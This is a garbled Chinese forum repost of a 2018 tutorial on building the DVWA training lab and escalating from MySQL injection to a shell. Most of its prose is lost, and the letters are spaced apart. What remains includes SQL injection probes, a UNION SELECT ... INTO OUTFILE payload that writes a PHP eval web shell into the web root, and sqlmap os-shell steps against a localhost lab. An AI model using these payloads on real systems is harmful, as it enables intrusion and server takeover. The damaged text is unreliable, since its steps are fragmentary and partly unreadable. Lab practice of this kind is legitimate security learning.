搜索

[13111] 2018-08-26_搭建dvwa环境学习从MySql注入到GetShell

文档创建者:s7ckTeam
浏览次数:18
最后更新:2025-01-18
2018-08-26_搭建dvwa环境学习从MySql注入到GetShell d v w a M y S q l G e t S h e l l z h e n g p e n g f e i   F r e e B u f   2 0 1 8 - 0 8 - 2 6   x s s g e t s h e l l C C I P g e t s h e l l m y s q l g e t s h e l l s q l m a p   m y s q l     g e t s h e l l     D V W A s q l x s s g e t s h e l l S T E P   1   1 X a m p p 2 D v w a S T E P   2   x a m p p a p a c h e c o n f i g 4 4 3 3   8 0 8 1
d v w a x a m p p h t d o c S T E P   3   访 * * * *
h t t p : / / w w w . f r e e b u f . c o m / s e c t o o l / 1 0 2 6 6 1 . h t m l   * * * * g e t s h e l l 1 2 s q l m y s q l m y s q l l o a d _ f i l e ( ) w e b s h e l l S T E P   1 1 1 a n d   1   = 2 1 o r   1 2 3 4   = 1 2 3 4
l o w s q l w h e r e o r S T E P   2   S Q L u n i o n S Q L S E L E C T i d 1 S Q L ( S E L E C T ) , U N I O N 使 U N I O N S E L E C T S E L E C T U N I O N , S E L E C T 1 i d 1   2 i d 1   u n i o n   s e l e c t   1 , 2 s e l e c t
S T E P   3   u n i o n m y s q l 1 1   u n i o n   s e l e c t   1 , < ? p h p   @ e v a l ( $ _ P O S T [ p a s s ] )   ? >   i n t o   o u t f i l e   C : / x a m p p / h t d o c s / d v w a / 1 . p h p   #   使 i n t o o u t f i l e   1 . p h p 2 p y t h o n 1   u n i o n   s e l e c t   1 , < ? p h p   @ e v a l ( $ _ P O S T [ p a s s ] )   ? >   i n t o   o u t f i l e   C : / x a m p p / h t d o c s / d v w a / 1 . p h p   #   s q l 怀 3 1 . p h p
  s q l s q l m a p s q l S T E P 1   : U R L : h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 1 / d v w a / v u l n e r a b i l i t i e s / s q l i / ? i d = 1 & S u b m i t = S u b m i t # , X s q l m a p 3 0 2 s q l m a p c o o k i e S T E P   2 s q l m a p o s - s h e l l   o s - s h e l l   s h e l l w i n d o w s c m d
S T E P   3 D v w a p h p p h p 2 s h e l l C : x a m p p h t d o c s d v w a w i n d o w s S T E P   4   o s - s h e l l p h p 访 S T E P   5 2 . p h p p h p p h p s h e l l
s q l m a p c o o k i e o s - s h e l l 1 w a f 2 l i n u x o s - s h e l l l i n u x s h e l l * z h e n g p e n g f e i   F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理